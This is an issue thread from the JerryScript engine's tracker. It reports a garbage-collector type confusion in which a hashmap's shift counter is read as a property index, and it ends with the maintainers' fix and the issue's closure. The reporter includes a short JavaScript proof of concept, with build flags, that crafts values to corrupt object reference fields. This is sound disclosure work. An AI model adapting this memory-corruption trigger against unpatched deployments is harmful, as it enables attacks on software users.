jerryscript-project/jerryscript #2146: misuse of type in ecma_gc_mark_property function which can lead to memory corruption

zbvs, 2017-12-12:
in ecma_gc_mark function

```
      JERRY_ASSERT (prop_iter_p->types[0] == ECMA_PROPERTY_TYPE_HASHMAP
                    || ECMA_PROPERTY_IS_PROPERTY_PAIR (prop_iter_p));

      ecma_gc_mark_property ((ecma_property_pair_t *) prop_iter_p, 0);
      ecma_gc_mark_property ((ecma_property_pair_t *) prop_iter_p, 1);
```
it call ecma_gc_mark_property function.

```
static void
ecma_gc_free_native_pointer (ecma_property_t *property_p, /**< property */
                             lit_magic_string_id_t id) /**< identifier of internal property */
...
```
but type of argument can be hashmap. this bug make no problem in most situation because header.types[0] will be always 4( ECMA_PROPERTY_TYPE_HASHMAP ) and types[1] will be 0 so it . but types[1] of hashmap is shiftcounter so it can be bigger number in very specific case (  in below code, when max_property_count is bigger than LIT_STRING_HASH_LIMIT   ... )

```
//jerry-core/ecma/base/ecma-property-hashmap.c
void
ecma_property_hashmap_create (ecma_object_t *object_p) /**< object */
{
......
......
  if (max_property_count <= LIT_STRING_HASH_LIMIT)
  {
    hashmap_p->header.types[1] = 0;
  }
  else
  {
    while (max_property_count > LIT_STRING_HASH_LIMIT)
    {
      shift_counter++;
      max_property_count >>= 1;
    }
  }

  hashmap_p->header.types[1] = shift_counter;
.....
```

if shift_counter is bigger than type misuse will trigger bug. 

      ecma_value_t value = property_pair_p->values[index].value;

zbvs, 2017-12-24:
here is simple poc. 
this need to have bigger than 512k memory.

os : ubuntu 16.04 
build command: python tools/build.py --profile=es2015-subset  --mem-heap 2048  --cpointer-32bit ON 

```
results = []
for(var j=0;j<0x10500;++j){

    if(j>0x10015){
        if(j==0x10016) {
            print(j);
        }
	results.push(new Object())
    }else{
	// 0x3003(12291) << ECMA_DIRECT_SHIFT = 0x300030
	//  in ecma_gc_set_object_visited: object_p->type_flags_refs =  0x30030 | ECMA_OBJECT_REF_ONE = 0x30070  
	// 0x30070 >> ECMA_DIRECT_SHIFT = 0x3007 (12295)
	if(j==0x1d7d){
	results.push(0x3003)
	print(results[0x1d7d])
	}else{
	results.push(j)
	}

    }
        
}
    
print(results[0x1d7d])

```

zherczeg, 2018-01-29:
Thank you for the report, I will look onto this.

PR #2212 (2018-02-22): Exclude hashmaps from GC marks.
Fixes #2146.

The issue is valid, but the test case does not work anymore. I cannot add a test case myself.
commit d8412707 (2018-02-22): Exclude hashmaps from GC marks. (#2212)

Fixes #2146.

JerryScript-DCO-1.0-Signed-off-by: Zoltan Herczeg zherczeg.u-szeged@partner.samsung.com
closed 2018-02-22 by yichoi